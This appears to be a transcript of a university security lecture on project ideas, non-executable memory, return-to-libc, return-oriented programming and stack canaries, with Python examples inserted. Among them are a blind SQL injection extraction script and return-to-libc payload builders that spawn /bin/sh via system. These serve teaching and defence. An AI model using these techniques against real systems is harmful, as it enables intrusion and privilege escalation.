Good morning, everyone. Thanks for being here today. Okay, let's go. So, submitting your assignment write-ups. You can submit your write-up now, and the reduction, what is it, 20% per day, applies. That will only apply to the levels that you break from yesterday to today. So if you break two levels and you would have gotten 20 points, you'd get 20% less than that, right? I hate doing math in front of all of you. Right, so you can just submit an additional write-up for those levels that you broke. That would be totally fine. Questions, comments, thoughts on the assignment? No, not right now, we've got to wait. Let's give it three or four days for all the reductions to kick in. Then we're happy to discuss. I'll also leave that server up so you can play with it, access it, work on the levels, all that kind of stuff. If you wrote any source code, submit it. Deleted it? How are you ever going to solve this problem again? So just mention it in your report. But I think I set it up so you have to submit something, so just submit something. Is it okay to leave all the source files in my home directory and just write about them in the report? No, try to attach them, since they're separate systems, because I don't want to have to copy everybody's. Some people have, I don't know, libc source files, everything in there, huge directory sizes. Yeah, you can copy the files from the server to a local folder and submit them from there. Cool, anything else? Yeah. The solutions, can we see the solutions? Will they be given out? No. No, that's why you have another four weeks to keep working on things. What about before the exam? Because a lot of these problems relate to what we have been taught in class, and if we do not crack all the levels before the semester exam, would you give out the solutions then? No. Also, there's tons of intentionally vulnerable software online.
So if you find stuff, you can email it to the class and say, hey, here's an example of an integer overflow vulnerability, here's a program and here's how to exploit it. So yeah, definitely leverage all the information that's out there. But we're going to reuse these levels, so don't post your solutions online, all that kind of normal schoolwork stuff. Anything else? Cool, all right. Projects. I posted some project ideas on the website. There are two types of projects you can do. You can either build a prevention security library, or you can create some kind of automated exploitation tool that will try to automatically exploit these types of vulnerabilities. You can choose whichever you want. As mentioned previously, your group is going to be either one person or two people, so max two people in your group. I expect these to be done individually or in pairs so I know that you're actually doing stuff and not carrying some person who's not doing anything, right? You've all been in groups like that. Yes, I have a subtle lack there. OK, so some of the ideas. I'm also open to new ideas. If you have something new that you really want to try out, email me. We'll work on it to see if we can make it fit, because I have to get the right level of interesting enough but not impossible. And then I can put it on here so that other people can decide to do that project too. So these are some of my ideas, things that I think would be cool. First, prevention. Generally in prevention, the things that I think are really interesting are security defenses that can be applied automatically, that require almost no changes to the original source code. To me, those are super cool, really awesome defenses. If you have to say, well, the programmer writes their code and uses my library, that can also be cool, right? But then it needs to be a little more technically interesting.
This is a lot trickier to apply to legacy software. So one of the project ideas here is size-aware overflow functions. The idea is you want to prevent buffer overflow attacks by hooking malloc and hooking the traditional overflow functions to keep track of the size of all malloc'd pointers. Then when pointers are passed to the traditional overflow functions, the ones that we talked about, you look up that size from the information you're keeping and make sure they're not trying to copy more. So you can actually translate a strcpy into a strncpy to make sure that it only ever copies that amount of data. If you want to do this kind of stuff, I'll also probably add a little more detail here. These were kind of my high-level thoughts. But LD_PRELOAD is a mechanism to say that a library should be loaded when a program is executed. I think some of you have actually emailed me about this, trying to use it to exploit some of the examples. So this can be used to provide your own version of malloc and printf and some other functionality. If you use this, it allows you to hook in and add protection mechanisms. This is the way you can do it without requiring any modifications to the source code, so it can be applied to any binary. So those are some high-level ideas of how to do this. Also, for most of the projects, I added a stretch goal. When I was working at Microsoft, we always had our goals for the year and then our stretch goals of where we tried to go. So if you do the stretch goal, this will be like extra credit or something. We'll figure out something good. So the basic version you can easily do with malloc, because when you malloc memory, we know the pointer that gets returned and we know the size that gets passed to malloc.
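The bookkeeping described above can be sketched as a small model. This is a Python simulation, not an actual LD_PRELOAD library (a real one would be a shared object written in C). The names `SizeTable`, `on_malloc`, and `checked_strcpy` are hypothetical, pointers are modelled as integer offsets, and process memory is modelled as a `bytearray`.

```python
class SizeTable:
    """Toy model of a malloc hook that remembers each allocation's size."""

    def __init__(self, heap_size=256):
        self.heap = bytearray(heap_size)  # stand-in for process memory
        self.sizes = {}                   # pointer -> allocated size
        self.next_free = 0

    def on_malloc(self, size):
        """Hypothetical malloc hook: bump-allocate and record the size."""
        if self.next_free + size > len(self.heap):
            raise MemoryError("toy heap exhausted")
        ptr = self.next_free
        self.next_free += size
        self.sizes[ptr] = size
        return ptr

    def checked_strcpy(self, dest, src):
        """Hypothetical strcpy hook that behaves like a bounded copy.

        Copies at most size-1 bytes plus a terminating NUL, so the copy
        can never run past the recorded allocation.
        """
        size = self.sizes.get(dest)
        if size is None:
            raise ValueError("unknown pointer: no recorded size")
        if size == 0:
            return 0
        # strcpy stops at the first NUL in the source string.
        string = src.split(b"\x00", 1)[0]
        data = string[: size - 1] + b"\x00"
        self.heap[dest : dest + len(data)] = data
        return len(data)


table = SizeTable()
first = table.on_malloc(8)
second = table.on_malloc(8)
table.heap[second : second + 8] = b"BBBBBBBB"
table.checked_strcpy(first, b"A" * 100)   # would overflow with plain strcpy
print(bytes(table.heap[first : first + 8]))
print(bytes(table.heap[second : second + 8]))
```

In this model the neighbouring allocation is left untouched because the copy is truncated to the recorded size. Whether to truncate silently or abort the program is a design choice the project would have to make.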
So you should be able to do this and ensure that none of these overflow functions actually overflow one of these malloc-based pointers, right? But as you saw on the homework assignment, a lot of these buffers are actually stack-based buffers. So the interesting thing here, the stretch goal, is how to implement this with stack-based buffers. Could you somehow try to automatically infer, from inside these functions, the size of the buffer on the stack? Maybe you can inspect the code at runtime. I don't know, there are a lot of cool ways to take this to actually implement something like it. You could pre-compile, or maybe you add a compilation step to change all the local buffers into mallocs. Something interesting can definitely be done here, so if you want to take it in this direction, feel free. Okay, format strings. This is a similar type of thing. You want to hook the traditional printf function and provide a safe version that filters out all of those vulnerabilities that we talked about. The trick here is to remove all possible combinations of %n. So you'll actually have to study and understand the format string specification, because if you just filter out the literal %n, as we saw, there are all kinds of positional arguments and all kinds of modifiers. That actually makes this a little more interesting than I was originally thinking. The stretch goal would be to think about how to extend this to also prevent information leakage vulnerabilities. This could actually be pretty cool: when the printf function is called, try to inspect the stack to see how many parameters were explicitly passed to that function, and then enforce that constraint in the printf function. So you wouldn't actually be able to access anything outside of that bound. That could be really cool. And, oh, maybe I'll, no, I like this.
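The point about positional arguments and modifiers can be sketched as a detector for `%n`-style write conversions. This is a minimal Python sketch under stated assumptions: the regular expression only approximates the C format string syntax, and the function names `write_conversions` and `is_safe_format` are hypothetical. It only detects; whether a hooked printf should reject or rewrite the string is left open.

```python
import re

# One printf-style conversion: %[pos$][flags][width][.precision][length]conv
# This pattern is an approximation of the C syntax, not a full parser.
_CONVERSION = re.compile(
    r"%"
    r"(?:\d+\$)?"                    # positional argument, e.g. 5$
    r"[-+ #0']*"                     # flags
    r"(?:\*(?:\d+\$)?|\d+)?"         # width
    r"(?:\.(?:\*(?:\d+\$)?|\d*))?"   # precision
    r"(?:hh|h|ll|l|j|z|t|L|q)?"      # length modifier
    r"(?P<conv>[A-Za-z%])"           # conversion character
)


def write_conversions(fmt):
    """Return every conversion in fmt that writes to memory (conv 'n')."""
    return [
        m.group(0)
        for m in _CONVERSION.finditer(fmt)
        if m.group("conv") == "n"
    ]


def is_safe_format(fmt):
    """True if fmt contains no %n-style conversion."""
    return not write_conversions(fmt)


for candidate in ["hello %s %d", "%n", "%5$n", "%hhn", "%08x%4$hn", "100%%n"]:
    print(repr(candidate), write_conversions(candidate))
```

Scanning conversion by conversion, rather than searching for the substring `%n`, is what lets the sketch treat `%%n` (a literal percent sign followed by the letter n) as harmless while still flagging `%5$n` and `%hhn`.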
Okay, so I think this one is one of the simpler ones implementation-wise. So you also need to write three distinct programs that contain format string vulnerabilities, along with reliable and repeatable exploits for them. This helps make sure you know about printf vulnerabilities. Questions? Feel free to stop me if you want. There you go, cool. Okay, we're going to get into web stuff, hopefully by Wednesday. So there's also a project about cross-site scripting prevention: provide some kind of security layer that prevents cross-site scripting vulnerabilities. You should try to do this in a way that requires minimal modifications to the PHP program. Obviously, if you have experience in web or web vulnerabilities, this would be a good way for you to go, especially now when we're just getting into that content. The stretch goal would be to extend this project to prevent context-sensitive cross-site scripting vulnerabilities, and I'll add links here to what exactly I mean by context-sensitive. Similar thing with SQL injection vulnerabilities. Create some kind of layer or wrapper or something that instruments the attacker-supplied variables and checks that those are not used in a SQL query. Also a cool thing: prevent second-order SQL injection vulnerabilities. So those are the high-level prevention mechanisms. To be completely honest, I wanted to add stuff in here about networks, but everything I thought of ended up back at just doing SSL, basically. Like, prevent TCP hijacking? That's why we should use SSL, or TLS, right? But if you have some cool idea there, please talk to me about it. Okay, for exploits. Hopefully you kind of got this as you were going through the levels, that a lot of this stuff can actually be automated to help you. So, automatic buffer overflow exploitation. Basically, design some kind of way to describe the vulnerability.
It doesn't have to be a language in the traditional sense. It just has to be some way that, when I find a vulnerability, I can tell your program, hey, this is how you trigger the vulnerability, here's the binary, automatically exploit it. So what you need to do is figure out the length, figure out what's going to crash it, figure out the NOP sled and the shellcode and the offset and all that stuff, and figure out the address, all of it automatically. The stretch goal here, and for many of these, is just to make it work on a different architecture, so make it work on a 64-bit architecture. In a similar vein, automatic format string exploitation. This is basically the same thing: take a binary, have some way to describe which input is vulnerable, and then automatically construct the format string that will exploit that vulnerability. So you have to find out where your input is on the stack, which positional argument you need, what the output of the string is, and what all the values are that you need to send in there. Yeah, this one's going to be really cool. I think you can definitely do this and it would help a lot. And the stretch goal is to extend the project to work on x86 64-bit binaries. Okay, in the cross-site scripting world: develop a tool that automatically generates a precise cross-site scripting payload. A lot of the cross-site scripting tools use a huge list of exploits and just try sending stuff to see if the site is vulnerable. The problem is that it goes back to context sensitivity, so it depends on where in the HTML page this output is used. So what you should do is create a model of the browser's parsing engine, with all the characters that transition the browser's parsing state. See where that output is used, figure out what state the JavaScript engine or the parsing engine is in at that point, and then figure out what malicious characters you need to transition the browser into executing JavaScript.
So, oftentimes it's an opening script tag, right? But oftentimes it's actually more complicated, or you don't even need angle brackets at some point. So your tool should be able to generate the transition that actually does this. And the stretch goal here would be to integrate the tool with a crawler, an automated crawling system, with w3af as a model there. Blind SQL injection: this is a tool that actually does exist. The idea with blind SQL injection is that you don't get any output, but you do get one bit of information, which says whether the injected condition was true or not. So you can use this technique to automatically extract the entire database given this one bit of information. That's basically what this project is about. And then, propose your own projects. I guess I don't have a due date. I was thinking last day of class, but we'll figure out a good due date, and then you'll write up a two-page report about the project, what it did, how you did it. Maybe also do demos or something for me and/or the TAs. We'll figure out that stuff as we get close, but now you can start thinking about what project you want to do, if you want to try a new project, if you want to work in pairs or by yourselves, all that kind of stuff. So, questions? Yes? For the exploitation tools, like the format string one, is there a delivery method? Because some programs take the format string from files or from arguments. Is the delivery method assumed? I think you should know it. The program doesn't have to figure it out, but you have to have a way to tell your program what it is, right? And it doesn't have to cover every single possible case, but it should cover the cases we talked about: arguments, input, maybe, those kinds of things. It doesn't need to be crazy complex. You don't need a language that describes, you send this and then they send you this and then you expect this and then you send the format string, right?
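The one-bit-at-a-time extraction behind the blind SQL injection project can be sketched as follows. This is a minimal Python sketch using an in-memory SQLite database as the stand-in target. The table, the column names, the secret, and the functions `make_oracle` and `extract_password` are all made up for illustration, and a real target would be reached over HTTP rather than through a function call.

```python
import sqlite3


def make_oracle():
    """Build a toy vulnerable application backed by in-memory SQLite.

    The returned function reveals only True or False, never query output.
    """
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cr3t!')")

    def login_ok(name):
        # Deliberately vulnerable: attacker input is pasted into the query.
        query = "SELECT 1 FROM users WHERE name = '" + name + "'"
        return db.execute(query).fetchone() is not None

    return login_ok


def extract_password(oracle, max_len=32):
    """Recover the admin password using only the True/False answers."""
    recovered = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127  # ASCII code points; 0 means "past the end"
        while lo < hi:
            mid = (lo + hi) // 2
            injected = (
                "admin' AND coalesce(unicode(substr(password, %d, 1)), 0) > %d --"
                % (pos, mid)
            )
            if oracle(injected):
                lo = mid + 1   # character code is greater than mid
            else:
                hi = mid       # character code is mid or smaller
        if lo == 0:
            break              # no character at this position
        recovered += chr(lo)
    return recovered


print(extract_password(make_oracle()))
```

Each character costs seven yes/no questions here because the sketch binary-searches a 7-bit range. Extending this to enumerate tables and columns is what would turn it into the full database extraction described above.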
But it should have something like, here's the input, and then here's how I look for the result, right? That's another one: how do you know the result of that format string? Are there already tools available for all the ones that you talked about? I don't think so. The only one is the blind SQL injection; that tool does already exist, but I do think it's super cool and I think it would be fun to do. This one definitely does not exist. It's something that I definitely know can exist and would be really cool. I don't think these exist either. There is a research paper, which was kind of where I got some of these ideas. David Brumley's group at CMU has a paper on automatic exploit generation. But they're doing complicated stuff, like static analysis: they build up a whole SMT formula based on how to get to the vulnerability, and then it can automatically generate input that triggers it. You don't have to go that far. I mean, if you want to do the static analysis stuff, I think that'd be super cool. Questions? Is this already up or not? Yes. There should be a projects tab, I think. You may have to refresh. When do we need to have a project idea by? I would say end of this week, Friday. That way you have your idea and group all set, so you can crank for three weeks and do something cool. Cool. All right. Let's get done with binaries. We talked about all different types of vulnerabilities, right? And remember, we talked about classifying all of these application-level vulnerabilities, where really the core problem is memory corruption. It's that someone else is able to trick us into overwriting or changing some value in memory that they shouldn't be able to access, right? So if we lived in an ideal world, what would be the best way to prevent all these vulnerabilities? By coding correctly? Yeah. Right? Write good programs, right? Unfortunately, as we've been talking about in this class,
this is more or less impossible, right? I mean, we'd love for this to be the case. One way would be to use a different language. Use a language like Java or Python that actually does bounds checking, so it more or less eliminates these kinds of arbitrary memory writes. But what's the problem here? Performance could be one. And what's interpreting your Java or your Python programs? C, right? The interpreter is written in C or C++. JavaScript does bounds checking itself, but it's running on an engine and interpreter written in C or C++, and there are problems in there. And that's how attackers exploit memory corruption vulnerabilities through it. You could try to analyze the program, right? Analyze the program, find all the vulnerabilities, and tell the programmer before they execute it. What's the problem here? A little bit to enter in there. Yeah, so actually part of the problem is that precisely identifying every single vulnerability in a program, and getting nothing wrong, is equivalent to deciding whether the program halts or not. So it's equivalent to the halting problem. We can't solve the halting problem, which means we can't statically and precisely identify every single vulnerability in the code. This is actually one of those things where I can develop a tool that will find every buffer overflow vulnerability in your program, right? For every single line of the code, I say, yep, there's a buffer overflow there, there's a buffer overflow there, there's a buffer overflow there. So I'll find them all, right? But I'm also going to give you false positives, and I'm going to say things are vulnerable when they're not. So that's the problem there. The other technique is to make exploitation harder: make an adversary jump through more hoops in order to exploit the vulnerability. So is this useful from a security perspective?
It discourages people from trying to get past your security mechanisms? Is it worth their time? Mm, yes. So that goes back to the old joke: you and your friend are running from a bear in the woods, and do you have to outrun the bear? No. No, you only need to outrun your friend, right? And then you're fine. It's kind of a similar thing in our security sense. I don't need to be super secure. I just need to be a little bit more secure, so that the attacker is going to attack somebody else rather than me. Yeah. Well, unless you have a thing of honey on you and your friend doesn't. Yeah, exactly. That's a good point. I may be a more attractive target, in bear terms, covered in honey. Also it's probably hard to run when you're covered in honey, I don't know. But yeah, dedicated adversaries still become a problem. And so the other thing to think about is cost. How much does it cost an attacker to develop a reliable exploit for this type of vulnerability? If I can make it more expensive for them, then yes, okay, I'm not going to keep out the nation-state level attackers, but I can keep out the random hacker group, like Anonymous or whoever, who's just trying to do things for the lulz and trying to find things that way. We can also try detecting this. We can try detecting exploits and blocking them. What you're going to be doing there is some kind of dynamic analysis: do some kind of checks to see if something's being overflowed, if you're trying to copy more than you should be. Some of the things that have been done include analyzing system calls: see what system calls the application normally makes, and then if it deviates significantly, stop it and say that there was an attack. We talked about detection, right? Detection is good, right?
We need to know if our systems are compromised, but detection is often done after the fact, so how useful is it? You do want to know that you've been infected, but it didn't really stop anything. You could look at what the code's doing. You could see if it writes code and then jumps to it and starts executing that code. So you could try to develop, in some sense, some kind of exploit fingerprint, like the shellcode we were using that pushes things on the stack and then jumps to things on the stack. You could do some kind of integrity checking to check return addresses at runtime and make sure they haven't been tampered with. So there's been a lot of research. We're going to look specifically at making exploitation harder. So do you think that your job was easy with these exploits that you were writing and developing for assignment 3? No. No, it's hard, right? These things make it even harder. But we can see that whenever there's incentive to bypass these things or get around them, bad guys will find a way. So it's really this continuous arms race, where we develop a new kind of mechanism to make exploitation more difficult, and then the attackers go one step further and find ways around it, or find a more reliable way to do it. Then we figure out what they're doing and we make some new defense. So we constantly have this back and forth. We're going to look at this in a historical way, at how things evolved. So the first thing they said was, well, who ever wants to execute code on the stack? We should never execute code on the stack. So in Linux, there's an NX bit on memory, which is the no-execute bit. It's pretty much standard on all systems now. Basically, it marks a memory area as non-executable, right?
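One way to see what the NX marking means in practice is to look at the permission flags of each memory region. The sketch below parses text in the Linux `/proc/<pid>/maps` format and lists regions that are both writable and executable. The sample text, its addresses, and its paths are made up for illustration, and the function names are hypothetical.

```python
def parse_maps(text):
    """Parse lines in the Linux /proc/<pid>/maps format into dicts."""
    regions = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # skip blank or malformed lines
        start, end = (int(part, 16) for part in fields[0].split("-"))
        regions.append({
            "start": start,
            "end": end,
            "perms": fields[1],                            # e.g. "rw-p"
            "name": fields[5] if len(fields) > 5 else "",  # path or [stack]
        })
    return regions


def writable_and_executable(regions):
    """Regions where injected bytes could be written and then run."""
    return [r for r in regions if "w" in r["perms"] and "x" in r["perms"]]


# Made-up sample resembling a 32-bit process without a non-executable stack.
SAMPLE_MAPS = """\
08048000-08049000 r-xp 00000000 08:01 123 /home/user/level1
08049000-0804a000 rw-p 00000000 08:01 123 /home/user/level1
b7e00000-b7fa0000 r-xp 00000000 08:01 456 /lib/libc.so.6
bffdf000-c0000000 rwxp 00000000 00:00 0 [stack]
"""

for region in writable_and_executable(parse_maps(SAMPLE_MAPS)):
    print(hex(region["start"]), region["perms"], region["name"])
```

With a non-executable stack, the last line of the sample would read `rw-p` instead of `rwxp` and the list would come back empty. On a Linux machine the same parser can be pointed at the contents of `/proc/self/maps`.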
So it's actually one of the flags that we use when we compile your applications for assignment three: we say, okay, mark the stack as non-executable. Microsoft also has an implementation of this, called DEP. Microsoft is very interested in making exploits more difficult and trying to protect people, so it actually supports it, which is great. W xor X, where you can either write to a memory region or execute from it but you can't do both, is the version in the BSDs. And so we think, okay, well, problem solved, right? The attacker can't execute anything on the stack. But is that the end of the story? Why are we still talking about this? Could you put it in an environment variable? I'd say the environment variables are on the stack, right? So that's still on the stack, which makes sense. You wouldn't want to execute something in the environment, yeah. There are other locations, like the data section. Yeah, so the data section, right? And what about the heap? All we need to do is get to that address. Our shellcode can literally live anywhere in the program, for example in a user-supplied string or something like that. The basic idea of the NX bit is that you never want memory to be both writable and executable at the same time. That's where the problem comes from, because an attacker can write to it and then start executing from it. So one thing, what? This works for most programs we write, but what about Java or JavaScript, like a JavaScript engine? Would that work here? Why not? What's the feature of those interpreters that makes it so that this doesn't work? Dynamic code generation. What's another name for that? Eval. Eval is one. JIT, right? JITing code. Just-in-time compilation of code means compiling it at runtime from Java bytecode to x86 code, right?
So you have to write that code somewhere, and then you have to change that once-writable segment to be executable, and jump to it and execute it as code. So I can easily get around non-executable memory in a language like that. And oftentimes this is exactly what happens in JavaScript. Essentially, the attacker writes JavaScript code that, when it gets JITed, compiles to valid x86 shellcode, and they use an exploit to jump to that shellcode, which is actually part of the JavaScript execution. So that memory is executable, and should be executable, because the engine is literally writing bytes to it and then executing them. So think about constants in JavaScript. They're going to be compiled into constants in the machine code, and because x86 instructions are variable length, if you jump to the middle of an instruction it could be something completely different. There is also another way. There's a type of exploitation technique that originally started as return-into-libc, and it's related to the control of EBP that we talked about. So the idea is, what if we control EBP, or even if we control the stack? The stack has the function frames of every function that's been called up until that point. We saw the frame, and we know it contains the arguments, the saved EIP, the saved EBP, and the local variables. And we saw that when our function returns, it uses that saved EIP value. Normally we put our shellcode address there to jump to. The idea here is that, instead of jumping to my shellcode, the things that I want to happen are often already libc functions. So there's the system function, right? And we completely control this call stack now.
So what if we change this call stack to make the program think that it is calling into a libc function? All the arguments to that function also live on the stack, so we can change the stack to look like the function just got called. And so it will jump and start executing a function that already exists. We're taking advantage of code that's already there, written and loaded by the application. So that's the general idea of these techniques: we're going to create a fake call frame that looks like it came from some trusted function. We'll change the saved EIP to point there, not to our shellcode, but it will still accomplish the same goals that we want. We can use this technique with any function that's currently linked and used by the application. So we can get it to call any function we want. Often system is used. System takes one character pointer argument, which is the string to be executed. This is just as if you typed it into bash. So we can get the function to return into system, and now we've controlled the code very well. We can even do tricks like using strcpy to copy shellcode wherever we want, so from the stack to somewhere that's actually executable. All we have to do is find the system function in memory. To do this, we've seen we can use debuggers, or we can try to use the /proc memory mappings. Either way, we can figure out where the system function is actually loaded at runtime. So to see how this works: we have our buffer, we have the saved EBP and the saved EIP. And the function is going to strcpy our input into the buffer. So we're essentially creating a new call frame. Before, the only thing we cared about in that new call frame was the saved EIP. That was the only thing we cared about. But now I want this function to go and call system, right?
And this is going to call system if the saved EIP is overwritten with the address of system. Then above that is going to be the fake caller return address. We have to pretend that we called system from some other function. I believe there should also be a fake EBP on here, which is not on here. And then the address of the string /bin/sh, terminated by a zero byte. So we already kind of know how to do this. If we can get this string somewhere into this program, and it's not too hard, it can be somewhere here in our buffer, then as long as that string is there, we provide the address of that string. Now when system executes, it's going to look up the stack and see what the argument to system is. It's this /bin/sh, and it's going to execute /bin/sh for us. So the idea is, when the function executes its return, our stack pointer's going to be here. That way we've created a new frame with a new saved EIP, a new saved EBP, and arguments to system. And system starts executing as if it was called, right? What's going to stop us from calling a function that already exists in the program? Nothing. Why do you need a fake EBP? Wouldn't you need just one of them? You need both. You need both of the slots there, because system is going to create a new EBP, which is going to be where the stack pointer is, and then it's going to look up eight bytes from there for the first argument. And so the crazy thing is, once system executes, it's going to do whatever we asked, and then when it returns, it's going to return to wherever this return address is, right here, which we can control. So we can actually use this technique to chain multiple functions together. We can create this beautiful call stack of all of these functions of who's calling what, and as they return, they'll just call one after the other.
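The fake frame described above can be sketched as a byte layout. This is a minimal Python sketch for a 32-bit little-endian x86 target. Every address and the buffer offset below are made-up placeholders that would have to be discovered for a real binary, and the function names are hypothetical.

```python
import struct


def p32(value):
    """Pack a 32-bit little-endian word, as it is laid out on an x86 stack."""
    return struct.pack("<I", value)


def ret2libc_payload(offset_to_saved_ebp, system_addr, fake_ret, binsh_addr):
    """Build input that overwrites saved EBP and saved EIP with a fake frame."""
    return (
        b"A" * offset_to_saved_ebp  # fill the buffer up to the saved EBP
        + p32(0x42424242)           # overwritten saved EBP (placeholder value)
        + p32(system_addr)          # saved EIP now holds the address of system
        + p32(fake_ret)             # where system will "return" to afterwards
        + p32(binsh_addr)           # first argument: pointer to "/bin/sh"
    )


# Placeholder values, assumed for illustration only.
payload = ret2libc_payload(
    offset_to_saved_ebp=64,
    system_addr=0xB7E42DA0,
    fake_ret=0xB7E369D0,
    binsh_addr=0xB7F63A0B,
)
print(len(payload), payload[64:].hex())
```

When the vulnerable function returns, the stack pointer is left pointing at the fake return address, so once system saves the old EBP and sets up its own frame, the fake return address sits four bytes above the new EBP and the string pointer sits eight bytes above it, which matches the "look up eight" remark above.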
And this is how we can do all kinds of crazy stuff. For example, we can first call setuid, because sometimes the program is dropping privileges or saving its UID, the effective user ID, and we want to put it back by calling setuid. So we want to call that, then we want to call system, and we can chain these together. When the original function returns, it's going to call system, and then when system returns, it's going to call back into set... oh no, sorry. When the original function returns, it's going to call setuid. And then when setuid returns, it's going to call system. So in this way, we can chain these functions together. And then we can even try to, so we strcpy here, right? Yeah. So when you return to system, you cannot directly call setuid, right? Say that again. When you return to system, you cannot use system to call setuid. No, system will only execute things like in bash. I think it will do a fork and then an exec and then do whatever it's going to do. I'm trying to remember the way it does it. Yeah, well, I believe system may also drop privileges, I think so, if the real user ID is not the same as the effective user ID. So you need to do this first. It's a combination, I forget exactly how it's done, but basically you set the UID equal to the effective user ID. If you do that and then call system, that should work fine. So we can even copy the shellcode. We can get the program to copy our shellcode to an executable place and then execute it. This first strcpy is going to copy our buffer and our new frame onto the stack. Then when this original function returns, it's going to call strcpy, which copies our shellcode, from its address, to some place that is executable. And then when strcpy returns, we can have it return into this executable area that it just filled in.
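The setuid-then-system chain can be sketched as a list of stack words plus a tiny model of how the returns walk through them. This is a Python sketch under stated assumptions: it uses a `pop; ret` cleanup gadget between the two calls to step over setuid's argument, which is one common way to chain calls and is an assumption here, not something taken from the lecture slides. All addresses, the UID value, and the function names are hypothetical.

```python
import struct


def build_chain(calls):
    """calls: list of (function_addr, return_addr, [args]) packed as 32-bit words."""
    out = b""
    for func, ret, args in calls:
        out += struct.pack("<I", func)   # consumed by the previous 'ret'
        out += struct.pack("<I", ret)    # the callee's return address
        for arg in args:
            out += struct.pack("<I", arg)
    return out


def simulate(payload, functions, pop_gadgets):
    """Model the control flow: functions maps addr -> (name, argc),
    pop_gadgets maps addr -> number of words the gadget pops before 'ret'."""
    words = list(struct.unpack("<%dI" % (len(payload) // 4), payload))
    calls, sp = [], 0
    while sp < len(words):
        target = words[sp]
        sp += 1                          # 'ret' pops the next address
        if target in functions:
            name, argc = functions[target]
            # The callee sees [return address][arg1]... at the stack pointer.
            calls.append((name, words[sp + 1 : sp + 1 + argc]))
        elif target in pop_gadgets:
            sp += pop_gadgets[target]    # each pop discards one stack word
        else:
            break                        # unknown address: stop the model
    return calls


# Placeholder addresses, assumed for illustration only.
SETUID, SYSTEM, POP_RET = 0xB7EB7B20, 0xB7E42DA0, 0x080483F1
FAKE_RET, BINSH, UID = 0x41414141, 0xB7F63A0B, 1001

payload = build_chain([
    (SETUID, POP_RET, [UID]),      # setuid(UID), then pop its argument
    (SYSTEM, FAKE_RET, [BINSH]),   # system("/bin/sh")
])
print(simulate(payload, {SETUID: ("setuid", 1), SYSTEM: ("system", 1)}, {POP_RET: 1}))
```

Note that the packed UID contains zero bytes, so a strcpy-based overflow could not deliver this exact payload. The sketch ignores that constraint to keep the control flow visible.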
So in this way, we can actually get the program to copy our shellcode from someplace that's not executable to someplace that is executable. Also, all the memory mappings of what's writable or executable are things the program controls. So we could even call those functions to change the stack to be executable and then jump onto the stack. But we have to be a bit more precise when we're doing this. So you can see that yes, the job of the attacker does get more difficult. And what we're doing here is jumping to the start of each of these functions, because we want the entire behavior of these functions. But this can actually be generalized to execute arbitrary code. We saw we can chain calls, and we can do this arbitrarily many times. So the idea is we can execute arbitrary sequences of functions, right? We've seen mov esp, ebp; pop ebp; ret. We know these are the function epilogues, and we know what they do: they set the stack pointer to the current base pointer, they pop the value that's on top of the stack into the base pointer, and then they return using the next value on the stack, right above that saved base pointer, and start executing there. So what we can do is take advantage of these little chunks of code. These little chunks of code change the stack, move things, and then return. So if they have some other side effect, we can create a number of fake function frames that point to bits of code like this that do these little things. So let's say, I don't know, the instruction right before this was add one to EAX. If I jump into there, I know I'll increment EAX and then I'll start executing at whatever the next function frame above that is.
And let's say there's another one that will XOR EAX with EAX, and there's another one that will move EAX into EBX. So now I'm building up essentially a language of tiny little gadgets that each do one little thing, and by combining an arbitrary number of them, I can perform arbitrary computations. In effect, whatever my shellcode would do, I can make the program do. So the basic idea is you put all of this here. Okay, I see, this slide is using the epilogue to change the base pointer and the stack pointer, so to change where the function frame is. Yeah, this isn't too important. What I was talking about was return-oriented programming. This is when you generalize this completely by using snippets of code, so just a little thing followed by a return instruction. And this was actually one of those things: return-to-libc had been around for a while, and people kind of knew intellectually that this was a problem. I actually don't know if the attackers or the academics came first, but this was the technique that was used to build up arbitrary functionality. That's right, this is the paper: The Geometry of Innocent Flesh on the Bone. So the idea is we're reusing the stuff that's left there on the bone of the x86 code. And the idea is that in a large enough body of x86 executable code, you can find enough of these snippets, right? The beautiful thing about the code of the application is that it's fixed: the address of the code never changes, and that code is executable, right? So the address doesn't change and it's executable, which gets around all of our requirements. We just need to build up enough stuff for it to do. Okay, let's go here. Yeah. So the idea is you use these little gadgets, and you can see it here as well. Let me get this to work.
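To make the "language of gadgets" idea concrete, here is a toy Python simulation, not real exploit code. The three gadgets are the ones named above (add one to EAX, XOR EAX with EAX, move EAX into EBX); the gadget addresses and the `run_chain` helper are hypothetical names invented for this sketch.

```python
MASK32 = 0xFFFFFFFF  # registers are 32 bits wide on x86


def inc_eax(regs):
    regs["eax"] = (regs["eax"] + 1) & MASK32   # add 1 to EAX; ret


def xor_eax_eax(regs):
    regs["eax"] = regs["eax"] ^ regs["eax"]    # xor EAX, EAX; ret (always 0)


def mov_ebx_eax(regs):
    regs["ebx"] = regs["eax"]                  # mov EAX into EBX; ret


# Hypothetical addresses where each gadget is assumed to live in the code.
GADGETS = {0x1000: inc_eax, 0x2000: xor_eax_eax, 0x3000: mov_ebx_eax}


def run_chain(chain, regs):
    """Run gadget addresses in order, as if each gadget's ret popped the next one."""
    regs = dict(regs)  # work on a copy so the caller's registers are untouched
    for addr in chain:
        GADGETS[addr](regs)
    return regs
```

For example, the chain `[0x2000, 0x1000, 0x1000, 0x1000, 0x3000]` clears EAX, increments it three times, and copies it to EBX, so both registers end at 3 no matter what they held before.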
The idea is, yeah, you put the addresses in here. So you first go into here, and this will pop ECX, pop EAX, and return. So you can get values into ECX and into EAX, right? And then if we go execute Y, it will take the value in EAX and store it at the address that ECX points to, and then return. So we've essentially been able to copy this value into this destination address. Just by using these incredibly simple gadgets, we've been able to write to a memory location. And you can build this up to do more and more complicated, interesting things. So return-oriented programming is how almost all of the new exploits work on Windows and all those kinds of systems, because they're incredibly reliable and they get around all of these defense mechanisms. So, okay, that was one idea: make the stack not executable, right? Let's make memory not executable. Another idea is, hey, part of the problem is they're overwriting the return address, right? So let's prevent that. So then they added what are called canaries. One of the original papers on this was a paper at USENIX Security in 1998 called StackGuard. The idea is that you put a canary value after the saved EIP. So you have saved EIP, then the canary value, and then the saved base pointer. And that way you can check it. There are different types of canaries. You can put special values on there. You can use a random canary, so every time the program executes, that canary is different. You can XOR some random value with the return address, and then before you return, you do that XOR again and check. And the key point here is that you need to check before you actually execute the return instruction. And do you know why it's called a canary, right? So in, like, coal mines,
